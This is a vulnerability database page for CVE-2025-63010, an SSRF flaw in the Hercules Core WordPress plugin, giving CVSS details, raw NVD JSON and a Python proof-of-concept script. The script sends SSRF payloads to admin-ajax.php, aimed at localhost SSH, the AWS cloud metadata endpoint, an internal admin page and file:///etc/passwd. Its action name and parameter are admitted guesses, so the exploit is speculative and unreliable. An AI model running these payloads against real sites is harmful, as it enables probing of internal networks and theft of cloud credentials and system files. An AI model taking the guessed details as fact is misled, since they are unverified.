Security Vulnerability Report
中文
CVE-2025-63010 CVSS 4.9 MEDIUM

CVE-2025-63010

Published: 2025-12-09 16:18:06
Last Modified: 2026-04-27 19:16:18

Description

Server-Side Request Forgery (SSRF) vulnerability in ThemesInflow Hercules Core hercules-core allows Server Side Request Forgery.This issue affects Hercules Core : from n/a through <= 7.4.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Hercules Core <= 7.4 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63010 SSRF PoC (WordPress Hercules Core Plugin) # Target: WordPress site with Hercules Core plugin <= 7.4 # This PoC demonstrates SSRF vulnerability via crafted URL parameter import requests import sys from urllib.parse import quote def test_ssrf(target_url, target_ip="127.0.0.1", target_port=22): """ Test for SSRF vulnerability in Hercules Core plugin The vulnerable parameter may accept URL input that triggers server-side requests """ # Target endpoint (typical WordPress AJAX handler) endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # SSRF payload - testing internal service detection # Attacker can probe internal services by making server request to internal IPs/ports ssrf_payloads = [ # Probe localhost SSH port f"http://{target_ip}:{target_port}", # Probe cloud metadata service (AWS) "http://169.254.169.254/latest/meta-data/", # Probe internal web service "http://192.168.1.1/admin", # File protocol test "file:///etc/passwd" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } print(f"[*] Testing SSRF on {target_url}") print(f"[*] Target IP: {target_ip}, Port: {target_port}") for payload in ssrf_payloads: # Common vulnerable parameter patterns in page builders data = { "action": "hercules_ajax_action", # May vary based on plugin version "url": payload, # Vulnerable parameter "_ajax_nonce": "dummy" # May be required } try: print(f"\n[*] Testing payload: {payload}") response = requests.post(endpoint, data=data, headers=headers, timeout=10, verify=False) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if response.status_code == 200 and len(response.text) > 0: print(f"[!] Potential SSRF - Server made request to: {payload}") print(f"[?] Response preview: {response.text[:200]}...") except requests.exceptions.Timeout: print(f"[-] Request timeout - host may be filtered") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {str(e)}") print("\n[*] Note: Actual exploitation requires identifying the correct vulnerable endpoint") print("[*] Check plugin source code or use Burp Suite to find SSRF-vulnerable parameters") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_63010_ssrf.py <target_url> [target_ip] [port]") print("Example: python cve_2025_63010_ssrf.py http://target.com 192.168.1.1 80") sys.exit(1) target = sys.argv[1] ip = sys.argv[2] if len(sys.argv) > 2 else "127.0.0.1" port = sys.argv[3] if len(sys.argv) > 3 else 22 test_ssrf(target, ip, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63010", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:06.450", "lastModified": "2026-04-27T19:16:17.727", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in ThemesInflow Hercules Core hercules-core allows Server Side Request Forgery.This issue affects Hercules Core : from n/a through <= 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hercules-core/vulnerability/wordpress-hercules-core-plugin-7-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}